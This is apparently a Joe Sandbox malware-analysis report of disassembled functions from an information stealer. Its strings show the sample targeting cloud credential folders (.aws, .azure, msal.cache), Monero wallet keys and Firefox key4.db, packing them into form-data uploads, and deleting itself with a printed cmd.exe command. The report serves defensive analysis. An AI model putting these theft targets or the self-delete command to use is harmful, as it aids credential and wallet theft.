Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: \*.*
API String ID: 1974802433-1173974218
Opcode ID: 46a0960487acdacf2fd8ef0d0d4f45aa313d752388bab4cdc5630ddcade3ae05
Instruction ID: 71774e874bff6838fcadcdfaea7023f42c996f402008a6bac7216c547bb6b296
Opcode Fuzzy Hash: 46a0960487acdacf2fd8ef0d0d4f45aa313d752388bab4cdc5630ddcade3ae05
Instruction Fuzzy Hash: 51218B3A7001549BCB14CFACDCC9F9977B5EF8A308F044079A519E3391EA34AE19CB69

Function 004291EA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 00429256

Strings

%s\%s, xrefs: 0042921B, 00429221, 00429236, 0042923B

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: %s\%s
API String ID: 1974802433-4073750446
Opcode ID: 17400cc20f939fb2ea047b134b98f59f63716dce399d062876eda283c47b5410
Instruction ID: 48a9b12bb2e10cf1fcdd8e6fb660103a8b5b91703090a48299523f0d276b014d
Opcode Fuzzy Hash: 17400cc20f939fb2ea047b134b98f59f63716dce399d062876eda283c47b5410
Instruction Fuzzy Hash: F00128753102049FD708EB68DC81DA633ACFBC5310B004938B915CB352EB34ED49C768

Function 0042A4E5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 0042A548

Strings

%s\*, xrefs: 0042A513, 0042A519, 0042A52D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: %s\*
API String ID: 1974802433-766152087
Opcode ID: 147f18f658a4627c497f47d40985670674bd45b1b97b9c5dcec16a5a094effb5
Instruction ID: 0609e92204065f63010fd7ad1d7f6de40c2cf777a2a57bed9933e9f42ca579c2
Opcode Fuzzy Hash: 147f18f658a4627c497f47d40985670674bd45b1b97b9c5dcec16a5a094effb5
Instruction Fuzzy Hash: 9901FE76D012145FD704DF55ECC1DAA3B79AF86325B054038E81AF7391E630EE58C7A4

Function 0041F9A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 0041F9BC

Strings

".E, xrefs: 0041F9D3

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: InfoSystem
String ID: ".E
API String ID: 31276548-3376019375
Opcode ID: 1b2d5af43dd12cc97f1ca22d2a4559b3dc75b8610e382d2f08405efa2324d8b1
Instruction ID: d6f07fd9729eab18bf35d97595002372c1d2e6aa75cde9e8f8970a3912b3b12f
Opcode Fuzzy Hash: 1b2d5af43dd12cc97f1ca22d2a4559b3dc75b8610e382d2f08405efa2324d8b1
Instruction Fuzzy Hash: 09F0A0B7A000186BD2209759FC81D9B77ADEFCA21CB090121FA5993311E2256E1E86BA

Function 0042BD1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 0042BD60

Strings

%s\*, xrefs: 0042BD30, 0042BD36, 0042BD4D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: %s\*
API String ID: 1974802433-766152087
Opcode ID: c3e509897c29787022350f80ffc0ff6cef781e262badee9c2a4ab92802de6c54
Instruction ID: 931b0de070de10b7e66256f6a66663b599e1610311875de6a1b42976d5bd7aee
Opcode Fuzzy Hash: c3e509897c29787022350f80ffc0ff6cef781e262badee9c2a4ab92802de6c54
Instruction Fuzzy Hash: 7CF054B66202059FD704DF6CEC91D6A33ECAB85214F040939BC15D3352EA75B9088B54

Function 0041F53D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 0041F573

Strings

6l, xrefs: 0041F547

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: InformationTimeZone
String ID: 6l
API String ID: 565725191-3579878408
Opcode ID: d1f1aa9db316d0556c24cff3fcebf8ffe5a39d00abe2e1027b6969b4bb4cace5
Instruction ID: 51eb3bd1622886aac5f8ccd9b6177312287d20add2d8b6e62fb82a58f3c5e34c
Opcode Fuzzy Hash: d1f1aa9db316d0556c24cff3fcebf8ffe5a39d00abe2e1027b6969b4bb4cace5
Instruction Fuzzy Hash: 52E092BA700200BBD32CDF3CDDD5F5A36A99B86364B15463CB125CB3D9D9719C148658

Function 004201FF Relevance: 3.0, APIs: 2, Instructions: 33processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042023A
Process32First.KERNEL32(00000000,?), ref: 0042024A

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 51a0a3a86996dd71d6c256b735e4ff4c0fdb01524f04b67741bc59405e23ec16
Instruction ID: c579f703dafad097f5d9c0689e3975df6c889f8e9946543bcf98fd5d00d92f8f
Opcode Fuzzy Hash: 51a0a3a86996dd71d6c256b735e4ff4c0fdb01524f04b67741bc59405e23ec16
Instruction Fuzzy Hash: 50F0BE767003215BDB24CF2ADC85F5BBBA9FBC6300F084819B455CB391CA70D814CB69

Function 0040C009 Relevance: 1.5, APIs: 1, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0040C04B

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 76bf32a98701eed808fdec152c3dcd3fa556dd761d2147bff69bd5c35468af49
Instruction ID: f83c4e979e2241c40376acb44744fe4fe1f605f54e99aba1f5e8c3a0c1513ffb
Opcode Fuzzy Hash: 76bf32a98701eed808fdec152c3dcd3fa556dd761d2147bff69bd5c35468af49
Instruction Fuzzy Hash: 69F06D719083068FC304DF28C984A16BBF1EFC9754F05CA5DE88897301E630D994CB96

Function 0042D98B Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0042D9B4

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a27b26a9cc07503a5ffd4f9d8fd2edf3d2294b961f27338cad1e6b7784a11e9c
Instruction ID: 06ca29c7c77cbb7dcb3cfc013ab395935eb095cd7e1a9a9979d4901d29d8eb17
Opcode Fuzzy Hash: a27b26a9cc07503a5ffd4f9d8fd2edf3d2294b961f27338cad1e6b7784a11e9c
Instruction Fuzzy Hash: 9DE092BB2042009BC310DF28DD91EA677E9EB86300F05456CA985C7251E670FC04C755

Function 00428DDA Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00428DF2

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: DriveLogicalStrings
String ID:
API String ID: 2022863570-0
Opcode ID: 113d1b87fdbe9d4d3ad158efa6e221a9b99e2fa62463c5cd1ef1ff41a886c9bb
Instruction ID: f49399131d6cd1a0a0357cdb0235bfa083d093eafebc625f1058b8577526638d
Opcode Fuzzy Hash: 113d1b87fdbe9d4d3ad158efa6e221a9b99e2fa62463c5cd1ef1ff41a886c9bb
Instruction Fuzzy Hash: 42F039B9E012059FEB08CF54D891BD87BB1BB04300F24047DE606DB782DA3499488B80

Function 0040A09E Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00001000,00000000), ref: 0040A0BA

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: b6777f99fcc9ab9d3b0273c25965793aa14402d70d0dc89c73ee46f9b8689617
Instruction ID: 22b8e15c2dc92d2d8ce7db97a0b63f0b975dcbef69a24b4e2dabaf85396e310b
Opcode Fuzzy Hash: b6777f99fcc9ab9d3b0273c25965793aa14402d70d0dc89c73ee46f9b8689617
Instruction Fuzzy Hash: 81E01235340240EBE755D75CDD95F6133D5EB84344F4808387A16DB382EA74ED15C715

Function 0041F6B3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041F6D2

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 074da7e7c8075810696abcef79b98451fad9a9472c3c4834b1dbe4cbc0ff9711
Instruction ID: 328520a2f6c71d951bdf48b5bb8b27dd49798bebe312cf515b58bf2676e38ca3
Opcode Fuzzy Hash: 074da7e7c8075810696abcef79b98451fad9a9472c3c4834b1dbe4cbc0ff9711
Instruction Fuzzy Hash: 77E08CBA70030097D7188B4ADC55F35B3E6ABE8704F18842DA906CB3E5D678EC048600

Function 00405B4B Relevance: 19.9, APIs: 4, Strings: 7, Instructions: 673
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00406179
memcpy.MSVCRT(00000000,?,00000000), ref: 004061AC
memcpy.MSVCRT(00000000,?,?), ref: 004061D7
memcpy.MSVCRT(?,?,00000000), ref: 0040622A

Strings

build_id, xrefs: 00405E06, 00405E0C, 00405E1C
file_data, xrefs: 004060CE, 004060D4, 004060E4
", xrefs: 00405CCE, 00405CD4, 00405CE4, 00405E43, 00405E48, 00405FAB, 00405FB0, 0040610B, 00406110
token, xrefs: 00405C87, 00405C8D, 00405C9C, 00405CA1
------, xrefs: 00405B82, 00405B88, 00405B89, 00405B9F, 00405D5B, 00405D60, 00405EC3, 00405EC8, 00406023, 00406028
Content-Disposition: form-data; name=", xrefs: 00405C40, 00405C46, 00405C55, 00405C5A, 00405DD4, 00405DD9, 00405F3C, 00405F41, 0040609C, 004060A1
file_name, xrefs: 00405F6E, 00405F74, 00405F84

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memcpy$AllocateHeap
String ID: "$------$Content-Disposition: form-data; name="$build_id$file_data$file_name$token
API String ID: 4068229299-1375094155
Opcode ID: ccfd5a6aefc9422aae94d8b475944c0a34b64018c2f12c8ae1d3fb1001b9740d
Instruction ID: e566b6749127b83421f7d8bd2921eeafd4c76e6b7559269ba93b841b997abff9
Opcode Fuzzy Hash: ccfd5a6aefc9422aae94d8b475944c0a34b64018c2f12c8ae1d3fb1001b9740d
Instruction Fuzzy Hash: 2B2231B93024106FCB45DB9DDC91AAEB3EAAFDA208308403DE019D3362DB749E159B5D

Function 0042AE60 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0042AE7E
memset.MSVCRT ref: 0042AF8E
memset.MSVCRT ref: 0042B075

Strings

\.aws\, xrefs: 0042AFE0, 0042AFE6, 0042AFF3
Azure\.azure, xrefs: 0042AF5B
*.*, xrefs: 0042AF34
\.azure\, xrefs: 0042AED5, 0042AEDB, 0042AEE8
Azure\.aws, xrefs: 0042B043
Azure\.IdentityService, xrefs: 0042B146
msal.cache, xrefs: 0042B11F
\.IdentityService\, xrefs: 0042B0C6, 0042B0CC, 0042B0D9

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset
String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2221118986-3645552435
Opcode ID: a7a371ecf0f8076029e4cc7b57d98caedca736390b6fe0b7d350fb9b107a7fc3
Instruction ID: 0a88e78158d51e52cee96e28e865b3ad23bc5ccfa02deae9633e4b981ae8c292
Opcode Fuzzy Hash: a7a371ecf0f8076029e4cc7b57d98caedca736390b6fe0b7d350fb9b107a7fc3
Instruction Fuzzy Hash: 7691B6BAB101005FC704DFACDC92A6A37E9FB89745B040539F919D3312D774EA18CB99

Function 0040126E Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 192
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(?,00000000,00000001), ref: 0040143A

Strings

lTD, xrefs: 00401299
Wallets, xrefs: 004012B8, 004012BE, 004012D0
\Monero\wallet.keys, xrefs: 004012E8, 004012EE, 00401300
.keys, xrefs: 0040127B, 00401281, 0040128E
qqt, xrefs: 00401478
C:\ProgramData\, xrefs: 0040134E, 00401354, 00401366
0%E, xrefs: 00401395
lTD, xrefs: 00401334

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CopyFile
String ID: .keys$0%E$C:\ProgramData\$Wallets$\Monero\wallet.keys$lTD$lTD$qqt
API String ID: 1304948518-493669140
Opcode ID: edda2b6704b54c1dd2c937dcde069af76b5f0514b26aafe0e3f1ca78d3c32786
Instruction ID: 1c0c3a0fe20054a577398e8d610ba6037ccb98be1f247c7c6354646798c56e3a
Opcode Fuzzy Hash: edda2b6704b54c1dd2c937dcde069af76b5f0514b26aafe0e3f1ca78d3c32786
Instruction Fuzzy Hash: DA5151767101145FC704DB9CEC91EAE33BAEBCA604708442EE916D7316DEB4EE15CB98

Function 0042D651 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?), ref: 0042D844
memset.MSVCRT ref: 0042D864
ExitProcess.KERNEL32(00000000), ref: 0042D87E

Strings

C:\Windows\system32\cmd.exe, xrefs: 0042D810
/c timeout /t 10 & del /f /q ", xrefs: 0042D663, 0042D669, 0042D67E, 0042D683
" & exit, xrefs: 0042D786, 0042D78C, 0042D79B
open, xrefs: 0042D7E4
" & rd /s /q "C:\ProgramData\, xrefs: 0042D6D8, 0042D6DE, 0042D6ED

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: ExecuteExitProcessShellmemset
String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$C:\Windows\system32\cmd.exe$open
API String ID: 1852908831-2201502983
Opcode ID: f39581be4dbb3ba82523aaef3800270a0935aa1f83886992f7c7e9bff6325244
Instruction ID: e551c106cc49a58ed8e142b4f9164b15046ded37baae1d2c715c840eb547d2f3
Opcode Fuzzy Hash: f39581be4dbb3ba82523aaef3800270a0935aa1f83886992f7c7e9bff6325244
Instruction Fuzzy Hash: E6519E76B006048BC304DF9EDC81AAE73E5AFDA6067584139E815C3322DBB8EE5D875D

Function 0042D6FE Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?), ref: 0042D844
memset.MSVCRT ref: 0042D864
ExitProcess.KERNEL32(00000000), ref: 0042D87E

Strings

C:\Windows\system32\cmd.exe, xrefs: 0042D810
" & exit, xrefs: 0042D786, 0042D78C, 0042D79B
=@E, xrefs: 0042D710
open, xrefs: 0042D7E4
=@E, xrefs: 0042D72B

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: ExecuteExitProcessShellmemset
String ID: " & exit$=@E$=@E$C:\Windows\system32\cmd.exe$open
API String ID: 1852908831-1777539744
Opcode ID: 95da33e724ad7f7f1facfc5f5cbbdf1cb13fd9b5e6c9d2578defee88dc884ed4
Instruction ID: 098bc2924f9ee01437336e5800c6ce94c3868001c570cf6b015aab2e16dea32b
Opcode Fuzzy Hash: 95da33e724ad7f7f1facfc5f5cbbdf1cb13fd9b5e6c9d2578defee88dc884ed4
Instruction Fuzzy Hash: 3E418F76B006049BC700DF9EDC81AA973E5BFD9709B544139E818C3322DBB8EA5D8B5D

Function 00409E2C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 186
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 0040A046

Strings

Sec-WebSocket-Version: 13, xrefs: 00409F9C, 00409FA2, 00409FB6
u'E, xrefs: 00409EF9
HTTP/1.1Host: , xrefs: 00409EAA, 00409EB0, 00409EC1
Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00409F4B, 00409F51, 00409F65
GET , xrefs: 00409E6D, 00409E73, 00409E8F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: send
String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $u'E
API String ID: 2809346765-1937848619
Opcode ID: 8a2df545890ebcd2ccde8c9d34e4fad38da15e8cd78b0d0eae1f2fea33df3467
Instruction ID: f09d3922218363589a7554bb9a070cc817d1bc8e78065892c14d31b0da745550
Opcode Fuzzy Hash: 8a2df545890ebcd2ccde8c9d34e4fad38da15e8cd78b0d0eae1f2fea33df3467
Instruction Fuzzy Hash: DB516876644101AFC324CB5CECD5F9A73D9AFC6214F0C4538E41AC3351E6B8AE28C75A

Function 0040E827 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 176
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040E9D2

Strings

\key4.db, xrefs: 0040E865, 0040E86B, 0040E87A
C:\ProgramData\, xrefs: 0040E8D3, 0040E8D9, 0040E8EB
lTD, xrefs: 0040E8B7
lTD, xrefs: 0040E82E
'E, xrefs: 0040E91E

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
